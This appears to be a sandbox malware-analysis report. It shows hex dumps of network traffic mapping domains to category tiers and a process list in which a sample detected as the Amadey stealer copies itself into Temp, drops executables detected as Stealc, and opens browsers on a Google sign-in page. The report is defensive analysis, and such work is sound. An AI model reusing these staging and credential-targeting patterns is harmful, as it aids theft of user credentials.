2024-09-06 08:01:21 UTC	15851	IN	Data Raw: 7b 0d 0a 20 20 20 20 22 30 31 32 33 6d 6f 76 69 65 73 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 39 38 33 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 39 34 38 2c 20 31 31 30 36 2c 20 39 39 37 32 5d 7d 22 2c 0d 0a 20 20 20 20 22 31 30 32 30 33 39 38 2e 61 70 70 2e 6e 65 74 73 75 69 74 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 2c 20 35 39 33 38 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 32 32 38 2c 20 32 33 36 5d 7d 22 2c 0d 0a 20 20 20 20 22 31 33 33 37 78 2e 74 6f 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 39 38 33 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 36 35 37 2c 20 34 37 35 2c 20 34 30 36 38 5d 7d 22 2c 0d 0a 20 20 20 20 Data Ascii: { "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}", "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}", "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 65 72 32 5c 22 3a 20 5b 35 31 30 36 2c 20 35 32 30 33 2c 20 38 34 36 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 70 70 2e 63 68 65 63 6b 65 64 73 61 66 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 2c 20 33 39 37 39 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 31 30 36 2c 20 32 31 38 39 2c 20 38 34 36 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 70 70 2e 63 6c 65 61 72 73 63 6f 72 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 32 31 39 2c 20 38 34 36 39 2c 20 32 37 35 31 2c 20 34 34 35 38 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 70 70 2e 63 6c 69 63 6b 75 70 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 35 Data Ascii: er2\": [5106, 5203, 8469]}", "app.checkedsafe.com": "{\"Tier1\": [6061, 8405, 3979], \"Tier2\": [5106, 2189, 8469]}", "app.clearscore.com": "{\"Tier1\": [8405, 6061], \"Tier2\": [6219, 8469, 2751, 4458]}", "app.clickup.com": "{\"Tier1\": [5
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 37 2c 20 38 34 36 39 2c 20 38 31 32 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 77 73 2e 68 61 74 63 68 6c 69 6e 67 73 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 39 31 33 32 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 34 34 34 2c 20 39 32 34 34 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 77 73 30 35 39 2e 68 6f 73 74 63 6f 6d 6d 73 65 72 76 65 72 73 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 36 36 36 2c 20 34 31 35 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 77 73 31 34 37 2e 68 6f 73 74 63 6f 6d 6d 73 65 72 76 65 72 73 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 Data Ascii: 7, 8469, 8129]}", "aws.hatchlings.com": "{\"Tier1\": [9132, 6061], \"Tier2\": [5444, 9244]}", "aws059.hostcommservers.co.uk": "{\"Tier1\": [6061], \"Tier2\": [6666, 4159]}", "aws147.hostcommservers.co.uk": "{\"Tier1\": [6061], \"Tier2\": [4
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 20 20 20 20 22 63 61 72 74 2e 65 62 61 79 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 38 31 38 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 33 39 39 2c 20 39 34 39 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 61 72 74 2e 70 61 79 6d 65 6e 74 73 2e 65 62 61 79 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 38 31 38 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 33 39 39 2c 20 39 34 39 37 2c 20 38 33 36 36 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 61 73 65 2e 6f 6d 62 75 64 73 6d 61 6e 2d 73 65 72 76 69 63 65 73 2e 6f 72 67 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 33 39 37 39 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 38 38 36 2c 20 37 33 35 34 Data Ascii: "cart.ebay.co.uk": "{\"Tier1\": [7818, 8405], \"Tier2\": [7399, 9497]}", "cart.payments.ebay.co.uk": "{\"Tier1\": [7818, 8405], \"Tier2\": [7399, 9497, 8366]}", "case.ombudsman-services.org": "{\"Tier1\": [3979, 8405], \"Tier2\": [6886, 7354
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 38 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 65 65 64 61 69 6c 65 65 6e 62 6f 69 6c 65 72 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 31 31 33 34 2c 20 31 39 31 32 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 6a 70 67 61 74 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 39 39 33 34 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 6d 2e 62 65 72 72 79 73 2e 75 6b 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 6d 2e 66 6f 6f 64 61 6c 65 72 74 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 32 39 30 33 Data Ascii: 8]}", "creedaileenboiler.com": "{\"Tier1\": [6061], \"Tier2\": [1134, 1912]}", "crjpgate.com": "{\"Tier1\": [6061], \"Tier2\": [9934]}", "crm.berrys.uk.com": "{\"Tier1\": [8405], \"Tier2\": []}", "crm.foodalert.com": "{\"Tier1\": [2903
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 31 35 32 2c 20 32 33 36 2c 20 34 39 31 35 5d 7d 22 2c 0d 0a 20 20 20 20 22 65 6c 65 61 72 6e 2e 72 75 6e 73 68 61 77 2e 61 63 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 2c 20 36 30 36 31 2c 20 38 38 34 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 38 31 32 2c 20 31 32 34 30 5d 7d 22 2c 0d 0a 20 20 20 20 22 65 6c 65 61 72 6e 69 6e 67 2e 6e 6f 6f 64 6c 65 6e 6f 77 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 32 39 38 2c 20 31 32 34 30 2c 20 37 32 39 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 65 6c 70 2e 6e 6f 72 74 68 75 6d 62 72 69 61 2e 61 63 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 2c 20 38 38 34 Data Ascii: 152, 236, 4915]}", "elearn.runshaw.ac.uk": "{\"Tier1\": [7670, 6061, 8845], \"Tier2\": [8812, 1240]}", "elearning.noodlenow.co.uk": "{\"Tier1\": [7670, 6061], \"Tier2\": [4298, 1240, 7293]}", "elp.northumbria.ac.uk": "{\"Tier1\": [7670, 884
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 6e 65 74 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 35 37 35 2c 20 33 39 35 32 5d 7d 22 2c 0d 0a 20 20 20 20 22 67 61 6c 6c 65 72 69 65 73 2e 70 61 72 65 6e 74 73 64 6f 6d 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 38 36 5d 7d 22 2c 0d 0a 20 20 20 20 22 67 61 6d 65 2e 67 72 61 6e 62 6c 75 65 66 61 6e 74 61 73 79 2e 6a 70 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 37 34 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 32 35 36 2c 20 36 39 31 36 2c 20 37 32 31 39 2c 20 31 30 30 30 32 2c 20 37 31 33 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 67 61 6d 65 62 61 6e 61 6e 61 2e 63 6f 6d 22 3a 20 22 7b 5c Data Ascii: net": "{\"Tier1\": [6061, 8405], \"Tier2\": [8575, 3952]}", "galleries.parentsdome.com": "{\"Tier1\": [], \"Tier2\": [786]}", "game.granbluefantasy.jp": "{\"Tier1\": [8741], \"Tier2\": [256, 6916, 7219, 10002, 7133]}", "gamebanana.com": "{\
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 39 36 30 5d 7d 22 2c 0d 0a 20 20 20 20 22 69 63 74 70 6f 72 74 61 6c 2e 63 79 6d 72 75 2e 6e 68 73 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 31 34 38 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 5d 7d 22 2c 0d 0a 20 20 20 20 22 69 64 2e 61 74 6c 61 73 73 69 61 6e 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 35 39 33 38 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 31 33 36 2c 20 31 34 36 36 2c 20 32 33 36 2c 20 38 36 32 33 2c 20 34 34 32 36 2c 20 32 32 33 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 69 64 2e 61 75 74 6f 65 6e 72 6f 6c 6d 65 6e 74 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 Data Ascii: ], \"Tier2\": [960]}", "ictportal.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": []}", "id.atlassian.com": "{\"Tier1\": [6061, 5938], \"Tier2\": [5136, 1466, 236, 8623, 4426, 2237]}", "id.autoenrolment.co.uk": "{\"Tier1\": [6061], \"Ti
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 20 5b 37 38 33 38 5d 7d 22 2c 0d 0a 20 20 20 20 22 6c 65 65 64 73 2e 63 64 70 73 6f 66 74 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 35 36 38 2c 20 35 39 32 2c 20 31 31 32 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 6c 65 74 75 73 6b 6e 6f 77 2e 66 6f 63 75 73 76 69 73 69 6f 6e 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 31 30 31 2c 20 36 35 34 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 6c 65 78 2e 32 62 65 64 66 6f 72 64 72 6f 77 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 33 39 37 39 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 35 39 34 2c 20 39 38 34 34 5d 7d 22 2c 0d 0a 20 20 Data Ascii: [7838]}", "leeds.cdpsoft.com": "{\"Tier1\": [8405, 6061], \"Tier2\": [4568, 592, 1129]}", "letusknow.focusvision.com": "{\"Tier1\": [], \"Tier2\": [6101, 6547]}", "lex.2bedfordrow.co.uk": "{\"Tier1\": [3979], \"Tier2\": [4594, 9844]}",
2024-09-06 08:01:21 UTC	16384	IN	Data Raw: 3a 20 5b 37 36 37 30 2c 20 35 39 33 38 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 39 39 38 2c 20 37 35 38 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 6d 65 2e 73 75 6d 75 70 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 33 32 37 31 2c 20 33 33 38 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 6d 65 64 2e 65 74 6f 72 6f 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 33 39 32 37 2c 20 38 39 34 33 2c 20 37 39 39 2c 20 36 32 31 39 2c 20 32 38 36 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 6d 65 64 61 6c 2e 74 76 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 37 34 31 2c 20 39 38 33 2c 20 35 39 Data Ascii: : [7670, 5938], \"Tier2\": [8998, 7583]}", "me.sumup.com": "{\"Tier1\": [6061, 8405], \"Tier2\": [3271, 3387]}", "med.etoro.com": "{\"Tier1\": [8405, 6061], \"Tier2\": [3927, 8943, 799, 6219, 2863]}", "medal.tv": "{\"Tier1\": [8741, 983, 59

Target ID:	0
Start time:	03:57:44
Start date:	06/09/2024
Path:	C:\Users\user\Desktop\pud8g3zixE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pud8g3zixE.exe"
Imagebase:	0xf40000
File size:	1'946'624 bytes
MD5 hash:	57A1C647B3B2B8B56998E59EFE21BE64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1285433147.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1245341924.0000000005740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:57:46
Start date:	06/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe"
Imagebase:	0x8a0000
File size:	1'946'624 bytes
MD5 hash:	57A1C647B3B2B8B56998E59EFE21BE64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1308219786.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1267579083.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:57:47
Start date:	06/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Imagebase:	0x8a0000
File size:	1'946'624 bytes
MD5 hash:	57A1C647B3B2B8B56998E59EFE21BE64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.1321048201.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.1280591363.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:58:00
Start date:	06/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe
Imagebase:	0x8a0000
File size:	1'946'624 bytes
MD5 hash:	57A1C647B3B2B8B56998E59EFE21BE64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000003.1404487341.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	03:58:06
Start date:	06/09/2024
Path:	C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe"
Imagebase:	0xe60000
File size:	1'756'672 bytes
MD5 hash:	6976C4A250BCFEE1F7CCF3B3DD7CEF7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:58:08
Start date:	06/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe"
Imagebase:	0xd50000
File size:	917'504 bytes
MD5 hash:	9720060A0108D1A36B6F051E31353414
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:58:09
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:58:09
Start date:	06/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:58:09
Start date:	06/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd --attempting-deelevation
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:58:09
Start date:	06/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	05:58:10
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2068,i,15318855632718478656,17962543240319232679,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:58:10
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	05:58:10
Start date:	06/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe"
Imagebase:	0x350000
File size:	1'756'672 bytes
MD5 hash:	6976C4A250BCFEE1F7CCF3B3DD7CEF7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:58:11
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	05:58:14
Start date:	06/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2180 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29d0c8ec-f242-474c-a604-20d6ab7d4c7d} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebe1c6db10 socket
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	05:58:18
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6876 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:58:18
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7012 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:58:19
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7928 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	05:58:19
Start date:	06/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8084 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:58:22
Start date:	06/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2988 -parentBuildID 20230927232528 -prefsHandle 4092 -prefMapHandle 4140 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c0f5f11-3af4-44b2-a420-af88b8d55af5} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebf3d76b10 rdd
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
